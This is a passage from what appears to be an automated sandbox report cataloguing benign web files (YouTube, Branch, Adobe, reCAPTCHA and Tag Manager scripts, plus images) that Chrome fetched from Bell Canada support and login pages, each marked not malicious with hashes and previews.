                                                                                                                                                                                                                                                                                                                                      Preview:var scriptUrl = 'https:\/\/www.youtube.com\/s\/player\/78fcc867\/www-widgetapi.vflset\/www-widgetapi.js';try{var ttPolicy=window.trustedTypes.createPolicy("youtube-widget-api",{createScriptURL:function(x){return x}});scriptUrl=ttPolicy.createScriptURL(scriptUrl)}catch(e){}var YT;if(!window["YT"])YT={loading:0,loaded:0};var YTConfig;if(!window["YTConfig"])YTConfig={"host":"https://www.youtube.com"};.if(!YT.loading){YT.loading=1;(function(){var l=[];YT.ready=function(f){if(YT.loaded)f();else l.push(f)};window.onYTReady=function(){YT.loaded=1;var i=0;for(;i<l.length;i++)try{l[i]()}catch(e){}};YT.setConfig=function(c){var k;for(k in c)if(c.hasOwnProperty(k))YTConfig[k]=c[k]};var a=document.createElement("script");a.type="text/javascript";a.id="www-widgetapi-script";a.src=scriptUrl;a.async=true;var c=document.currentScript;if(c){var n=c.nonce||c.getAttribute("nonce");if(n)a.setAttribute("nonce",.n)}var b=document.getElementsByTagName("script")[0];b.parentNode.insertBefore(a,b)})()};.
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 587x600, components 3
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):20486
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.796891007553271
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:k5cMPL0bbQ5CDL0pF79QTCJSISc6JUMz+D0X7MVKDRLU:k5c00bbNDY779N9sUS7BlU
                                                                                                                                                                                                                                                                                                                                      MD5:1FFCAEC7E9878C830323B60A8BB86FB4
                                                                                                                                                                                                                                                                                                                                      SHA1:315AA4FEB415806DE5407DB2B97D01ABE14D3B6C
                                                                                                                                                                                                                                                                                                                                      SHA-256:760498E35AC620FAE05E6C1B1BC6C8224F38ED9151379C31203745AABB580F55
                                                                                                                                                                                                                                                                                                                                      SHA-512:E11FFFCAF9B5C4BB14FCB06B7811DCDAC5AA68957B5A1C1A0F38125E1016AB80B96C51D2AFF1D4CB0FBD5F2C5F22643226F607B17CDACFBCECFC4FC661D6E3E3
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://support.bell.ca/Styles/media/support/Wireline/img/communityForumRight-new.jpg
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF.............C...........................$ &%# #"(-90(*6+"#2D26;=@@@&0FKE>J9?@=...C...........=)#)==================================================......X.K....................................................................................`.............................................................................................................................................................................................................A............................C..{ga..<|.N...........................?^.9.GZg<.e..........................(y.... .uG....l...m+...@.......................?_AKO...............gA.......................P.....>[..:N..k.....C...89..8......................-<.,{.....O(...]..b.I...zybq.vX.....................P.7...7s./........qU...l.v.vY/...[{.n.....................B...>..I?OG..z6..5.M.S.....zm....yp....................ZT.}.<c..w....{5.4..-..X.u.Y...->S.K.....................1....>3f......,q.r..(6i...ia..E....................
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.912186294308169
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREFYo1yqXXl6ECUP1CSHI:UrXimPwqX1/tRo
                                                                                                                                                                                                                                                                                                                                      MD5:58F945C9D418F06F89DAC38E33C9CB3F
                                                                                                                                                                                                                                                                                                                                      SHA1:86FB4BD2D9DF351F2F973395210795C2BCBFA2DD
                                                                                                                                                                                                                                                                                                                                      SHA-256:951B8330552312B27356D86FD8EDA74E67700F16E9D8BD754D08A2484564A1B9
                                                                                                                                                                                                                                                                                                                                      SHA-512:0B189A69DF18396A01D34D47CB8D7FB8D827C79C58664EAA11A56ACEA56813A45F074FB8FE133861959D71A378C71F1BB46B34D393251C6FA149B2DF6BD74CAD
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&_t=1380522052703713689&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__1
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__1 === 'function' && branch_callback__1("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 179x359, components 3
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):12306
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.957752936273148
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:JTbenClUktpq0zTleiKQTy1syfi95/EJcP:JfenClUCKQCpa90A
                                                                                                                                                                                                                                                                                                                                      MD5:5C865DBDBE5489CA99F421A6B973F614
                                                                                                                                                                                                                                                                                                                                      SHA1:7AE0226D959ABE9E5F8D286EEBC3DF13240DE2A5
                                                                                                                                                                                                                                                                                                                                      SHA-256:2931A8B701600DA4EEC98964180AA22F475ABCF44FD9F2D5CE4B11DB2BAA3B38
                                                                                                                                                                                                                                                                                                                                      SHA-512:3F0CB8F833EDD6CC32842136A258756EEA234F81791BA4B95F3EB126B5205FD07FBB48B86387EC0632DD85CD68F14CC320376B8705394B7D4F75810D3393C3C6
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................".."............................................................g...................................................................!1.."2AQBRqs....#45abr.......36CST...Fc.....V...$%D................................................!.1.AQa"b..2Rr............?..j.T.$(.....;m..83.{ps.i....+...~..W..B.Wg..........;.....P.....'..5r....!=4.pm].......Q.evw...\.{+...OM\j...]..Bzj.W(^......W..B.Sg...........;.....P.....'..5r........\j...J...|.p..:.......5F.....T..ER*.T.v...VOwp...W..`..Ak.n.M.Y.)..7nV...%.`G.|y.1..H......8........{.u.B2R!,.}/i.uj$G.O.I......?.z.V......]0.D...*.:..T\..................._?.O..&....A./.....M[.Q..G._?.O..&..d...v..Y.e,q .......p*.Z.X...-.....u.:K..=..uj$..T................R^P.c.]7.r..ut..Q......9?..:5.K9D......=[.3.c.?..o.....V...?R.Q...Q..jO..n.Gd.#.h...[.v.YPzVY*.:...S..E...P.K....p...w./.^n.Tq.O..+..Ch.z.!C.8......F.>.....U&..F.jm%.
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):369
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.269443233510702
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:6:jwkMKngJv0KgFXAEAAalgjBQibr4z1XMYA/B3Jv0KgFXAEAAalgjBQibr4zHaFLm:jvgeTrAApBB4hct/BeTrAApBB40Ld+Jn
                                                                                                                                                                                                                                                                                                                                      MD5:7CE4212365BF1DCBC929A4E5EC2D0BE5
                                                                                                                                                                                                                                                                                                                                      SHA1:E62D681532A44585C7D532224F4FC2F9EA1485FB
                                                                                                                                                                                                                                                                                                                                      SHA-256:DB8D8D65ED6E7691A072B75B58C2F686D4E02CAC8639F92377A0A19DAAD1191F
                                                                                                                                                                                                                                                                                                                                      SHA-512:321AE507266B829AB7013A13DF5D86937D440711AADE9F337192FE879392FC7F752F57D22A0060C2D2C21B0FAA8CA1E2A80B9F1E3880FFBDC909AE4ED8394B0F
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:// For license information, see `https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC622e10283cf14079857536997034ee5f-source.js`.._satellite.__registerScript('https://assets.adobedtm.com/92c238f848e3/7634fe33bd4f/09957f73d351/RC622e10283cf14079857536997034ee5f-source.min.js', "_satellite.getVar(\"d_tracking_enabled\")||(_da_.da_noAutoPageTrack=1);");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.902793404502967
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREpEyqXXl6EAeQ1CSHI:UrXiglqX17MRo
                                                                                                                                                                                                                                                                                                                                      MD5:ABEC128E96803A20D55C93E54FAD5458
                                                                                                                                                                                                                                                                                                                                      SHA1:E60C513C210F84533668558E6343B4BAC948E878
                                                                                                                                                                                                                                                                                                                                      SHA-256:910D0405D12EF4DD1354343212C91BE169D0769E2163EECD9A877C00AFA3E795
                                                                                                                                                                                                                                                                                                                                      SHA-512:284E2DC7C6A5D25020791EC4B7193715F442B3C6250156C063ED0FE79E57094FC79DD14568E227FB282961B9CF25D6466851A8CD65F66EC3B28E77237FCAB94A
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://app.link/_r?sdk=web2.85.0&branch_key=key_live_adAu45V2R6wos7hoIYdA7flfytp07fPD&callback=branch_callback__0
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__0 === 'function' && branch_callback__0("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 179x359, components 3
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):12306
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):7.957752936273148
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:384:JTbenClUktpq0zTleiKQTy1syfi95/EJcP:JfenClUCKQCpa90A
                                                                                                                                                                                                                                                                                                                                      MD5:5C865DBDBE5489CA99F421A6B973F614
                                                                                                                                                                                                                                                                                                                                      SHA1:7AE0226D959ABE9E5F8D286EEBC3DF13240DE2A5
                                                                                                                                                                                                                                                                                                                                      SHA-256:2931A8B701600DA4EEC98964180AA22F475ABCF44FD9F2D5CE4B11DB2BAA3B38
                                                                                                                                                                                                                                                                                                                                      SHA-512:3F0CB8F833EDD6CC32842136A258756EEA234F81791BA4B95F3EB126B5205FD07FBB48B86387EC0632DD85CD68F14CC320376B8705394B7D4F75810D3393C3C6
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://mybell-qc.akamaized.net/Styles/RSX/mybell/img/img_login_MyBell_June2021.jpg?ver=202106071946
                                                                                                                                                                                                                                                                                                                                      Preview:......JFIF......................................................................................".."............................................................g...................................................................!1.."2AQBRqs....#45abr.......36CST...Fc.....V...$%D................................................!.1.AQa"b..2Rr............?..j.T.$(.....;m..83.{ps.i....+...~..W..B.Wg..........;.....P.....'..5r....!=4.pm].......Q.evw...\.{+...OM\j...]..Bzj.W(^......W..B.Sg...........;.....P.....'..5r........\j...J...|.p..:.......5F.....T..ER*.T.v...VOwp...W..`..Ak.n.M.Y.)..7nV...%.`G.|y.1..H......8........{.u.B2R!,.}/i.uj$G.O.I......?.z.V......]0.D...*.:..T\..................._?.O..&....A./.....M[.Q..G._?.O..&..d...v..Y.e,q .......p*.Z.X...-.....u.:K..=..uj$..T................R^P.c.]7.r..ut..Q......9?..:5.K9D......=[.3.c.?..o.....V...?R.Q...Q..jO..n.Gd.#.h...[.v.YPzVY*.:...S..E...P.K....p...w./.^n.Tq.O..+..Ch.z.!C.8......F.>.....U&..F.jm%.
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):52
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.933626199277108
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:ewC0sRsRivRs+2liTn:ewceRYKn0T
                                                                                                                                                                                                                                                                                                                                      MD5:679B717D854971E85FEF51EB67708F21
                                                                                                                                                                                                                                                                                                                                      SHA1:7E541463F38C259FB7EC8402F32D615D1C357E7C
                                                                                                                                                                                                                                                                                                                                      SHA-256:C2B165E6F18406768A82240F5BBB611BB757685370EAF92DB728CE24EFE1E340
                                                                                                                                                                                                                                                                                                                                      SHA-512:285027F576C24CB040450BCD8732BE2B502E9BD60B3E9BF933BA4F675FBC60E67F4F8A48FB395796A7CE6ED93BC3E7F108B6A2E5C0221D079B698A5E5867F70E
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://content-autofill.googleapis.com/v1/pages/ChVDaHJvbWUvMTE3LjAuNTkzOC4xMzQSHgnMTs6zSvbMUBIFDWdns_4SBQ3h5tTWEgUNU1pHxQ==?alt=proto
                                                                                                                                                                                                                                                                                                                                      Preview:CiMKCw1nZ7P+GgQIIxgBCgsN4ebU1hoECCIYAQoHDVNaR8UaAA==
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (15669), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):15669
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.263742140717986
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:06T0S1t5pEIntlomlmixUxwoaCnh21A1xKrpEIntlomlSopTg:rrPa6oaCnhIA1xAMIg
                                                                                                                                                                                                                                                                                                                                      MD5:CB5B7E9FD96CB0442D68F85B47E87902
                                                                                                                                                                                                                                                                                                                                      SHA1:D9E94789F8C9B539CEF9011D3A82398DF60E833A
                                                                                                                                                                                                                                                                                                                                      SHA-256:D9B2E5281ABB267C48866876D6037E8EDF343C52D185F147DBC8FA393C73C388
                                                                                                                                                                                                                                                                                                                                      SHA-512:329E8F71C12E3FF05358F2451CDE7523528CF53B98BCD2F5A4987F7B6C9E1038481359364E59E757CD8AC0E34D3AEA449C419671BC89B87ABA7058E2937F3147
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:function setechatCookie(e, t) { "https:" == window.location.protocol ? document.cookie = e + "=" + t + ";domain=.bell.ca;path=/;secure=true;samesite=Lax" : document.cookie = e + "=" + t + "; path=/; domain=.bell.ca;" } function getechatCookie(e) { var t = {}; return document.cookie.split(";").forEach(function (e) { var o = e.split("=")[0], i = e.substring(e.split("=")[0].length + 1); t[o.trim()] = i }), t[e] } function dragElement(e, t) { if (null !== e) { var o = 0, i = 0, c = 0, s = 0; if (-1 != navigator.userAgent.indexOf("MSIE") || !0 == !!document.documentMode) var a = document.getElementById("mydiv").getBoundingClientRect().left; else var a = $(window).width() - e.offsetWidth; var l = $(window).height() - e.offsetHeight; function p(e) { (e = e || window.event).preventDefault(), c = e.clientX, s = e.clientY, document.onmouseup = r, document.onmousemove = n } function n(p) { if ((p = p || window.event).preventDefault(), o = c - p.clientX, i = s - p.clientY, c = p.clientX, s = p.cli
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (701)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):558800
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.6661858145390775
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:12288:HHe/N32Dr0RnSXaKyEtG76ZKj1wa89jzQoDjU3+VLs/k5lS64cflFT3O01d:eMapiBMKZxRflF3d
                                                                                                                                                                                                                                                                                                                                      MD5:88A5FED5C87B1D3704AB225CFBE7A130
                                                                                                                                                                                                                                                                                                                                      SHA1:D64243C18FBAA356E4ABAE8414CCC4772D64060B
                                                                                                                                                                                                                                                                                                                                      SHA-256:F8E5F5CE9FF44073CFF24BCD3D2B8AA4E67B67891B14FF929FE4743880FDF82E
                                                                                                                                                                                                                                                                                                                                      SHA-512:8B8D1C9F4C36FD2383C96D0D484A6692F70422934BCCD3DB1F0787E1B753F7D5A8F0C91934805C4D865AED3D4673FF478F0AE23746D0C0E005E60848543B3D33
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.gstatic.com/recaptcha/releases/-ZG7BC9TxCVEbzIO2m429usb/recaptcha__en.js
                                                                                                                                                                                                                                                                                                                                      Preview:(function(){/*.. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/./*.. Copyright 2005, 2007 Bob Ippolito. All Rights Reserved.. Copyright The Closure Library Authors.. SPDX-License-Identifier: MIT.*/./*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/./*. Copyright The Closure Library Authors.. SPDX-License-Identifier: Apache-2.0.*/.var k=function(){return[function(n,S,D,d,Z,l,h,R,O){return(((n^53)&19)==((n&((((R=[34,2,46],n|72)==n&&(O=St(function(G,A,L){return L=(A=(G=function(f,H){return(f[(H=["replace","indexOf","trim"],H)[1]](d)!=-1&&(f=f.slice(f[H[1]](d))),f)[H[0]](/\s+/g,S)[H[0]](/\n/g,Z)[H[2]]()},G(Z+l)),G(Z+h)),A==L},D)),n)|56)==n&&(h=["https","",0],D=="*"?O="*":(d=g[R[2]](24,!0,h[1],new OI(D)),l=N[30](58,d,h[1]),Z=N[36](25,h[1],g[40](40,l,h[1]),v[21](R[1],1,S,D)),Z.D!=S||(Z.A==h[0]?E[30](90,h[R[1]],443,Z):Z.A=="http"&&.E[30](96,h[R[1]],80,Z)),O=Z.toString())),11))==n&&b.call(this,S),1)&&(O=x[42](16,C[42](44,v[R[0]](23,12),S),[u[20](3
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:HTML document, ASCII text, with very long lines (815)
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):3501
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.383873370647921
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:96:EI5cZUiKliCJ86U+QTEVWfeLwTauSEegdkZ5edOIC:EI5hiWNJ8kQTEVWfeUauRfdkZ5edO1
                                                                                                                                                                                                                                                                                                                                      MD5:147FD3B00C22BA9C939712E9213C24CA
                                                                                                                                                                                                                                                                                                                                      SHA1:3B48369B86FA0574F35379AACD1F42CC9C98A52B
                                                                                                                                                                                                                                                                                                                                      SHA-256:70F5B11C1870CF90201A6D5F770CA318A3FA5827C74A8765EDE22B487F7D4532
                                                                                                                                                                                                                                                                                                                                      SHA-512:E8419A71232EDAC8FD131446777F7D034B3171EFE07B3267479B439E4982650DB65A0D1DDC9F516315D5ED1B01ECFD2F7EB55D75D44AA51EE0AD494D441586D2
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      URL:https://www.googletagmanager.com/static/service_worker/4al0/sw_iframe.html?origin=https%3A%2F%2Fsupport.bell.ca
                                                                                                                                                                                                                                                                                                                                      Preview:<!DOCTYPE html>.<html>.<head>. <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon">.</head>.<body>. <script>.'use strict';class m{constructor(a){this.j=a;this.g={};this.h={};this.i=0;this.id=String(Math.floor(Number.MAX_SAFE_INTEGER*Math.random()))}}function n(a){return a.performance&&a.performance.now()||Date.now()}.var p=function(a,b){class d{constructor(c,g,f){this.failureType=c;this.data=g;this.g=f;this.h=new m(n(f))}s(c,g){const f=c.clientId;if(c.type===0){c.isDead=!0;var e=this.h,h=n(this.g);e.g[f]==null&&(e.g[f]=0,e.h[f]=h,e.i++);e.g[f]++;c.stats={targetId:e.id,clientCount:e.i,totalLifeMs:Math.round(h-e.j),heartbeatCount:e.g[f],clientLifeMs:Math.round(h-e.h[f])}}c.failure={failureType:this.failureType,data:this.data};g(c)}}return new d(5,a,b)};/*.. Copyright Google LLC. SPDX-License-Identifier: Apache-2.0.*/.let q=globalThis.trustedTypes,r;function t(){let a=null;if(!q)return a;try{const b=d=>d;a=q.createPolicy("goog#html",{createHTML:b,createScript:b,crea
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:very short file (no magic)
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):1
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):0.0
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:F:F
                                                                                                                                                                                                                                                                                                                                      MD5:7215EE9C7D9DC229D2921A40E899EC5F
                                                                                                                                                                                                                                                                                                                                      SHA1:B858CB282617FB0956D960215C8E84D1CCF909C6
                                                                                                                                                                                                                                                                                                                                      SHA-256:36A9E7F1C95B82FFB99743E0C5C4CE95D83C9A430AAC59F84EF3CBFAB6145068
                                                                                                                                                                                                                                                                                                                                      SHA-512:F90DDD77E400DFE6A3FCF479B00B1EE29E7015C5BB8CD70F5F15B4886CC339275FF553FC8A053F8DDC7324F45168CFFAF81F8C3AC93996F6536EEF38E5E40768
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                                                                                                                                      Size (bytes):91
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):4.956142338264213
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:3:Ub/HXiREy4MyqXXl6Ed61CSHI:UrXiZaqX1VCRo
                                                                                                                                                                                                                                                                                                                                      MD5:E2FAD4C69591F33C92D43C2148154B88
                                                                                                                                                                                                                                                                                                                                      SHA1:285DDE6E134D03872BAE9554B7C0B6775359CE3A
                                                                                                                                                                                                                                                                                                                                      SHA-256:5D00EB45C50FDE3F25B69488DDE1BC08E93E5B697FB81EEC42DAD1535EEBA1FD
                                                                                                                                                                                                                                                                                                                                      SHA-512:472F773E7A3A334F07D385A04804ACDE16905EFF555ABB54783220E6359CDAB5E767F5090007E6C92883F1515E260D15C12A8D88414F6E4AA2C394D85B0F7F45
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                                                                                                                                      Preview:/**/ typeof branch_callback__4 === 'function' && branch_callback__4("1380522052703713689");
                                                                                                                                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (11960), with no line terminators
                                                                                                                                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                                                                                                                                      Size (bytes):11960
                                                                                                                                                                                                                                                                                                                                      Entropy (8bit):5.093322687452155
                                                                                                                                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                                                                                                                                      SSDEEP:192:MRJbCrHqiu7SPJl41O+4Zhy2aMXQRlhDzJbiiqh:rtZ24ARltQiqh
                                                                                                                                                                                                                                                                                                                                      MD5:0FD16CCF7AA01A851CD7E73A210842F6
                                                                                                                                                                                                                                                                                                                                      SHA1:794E43A417A6CC2122E2596CBA2676B33E550356
                                                                                                                                                                                                                                                                                                                                      SHA-256:33E4DBE4F56AA8E4072EBCBEE88AA6FF6FFA05115BDB902A0C640FEBD13D9893
                                                                                                                                                                                                                                                                                                                                      SHA-512:1D805E0D8CEBD8A5D433E539F54A591B999E70C1CE8EAAA265527699B7B9B0F6A5AC97FC396E7097A82BFF95AA0BFBEC01D97A0D295C34DBA07404939FDB0EDE
                                                                                                                                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                                                                                                                                      Reputation:low
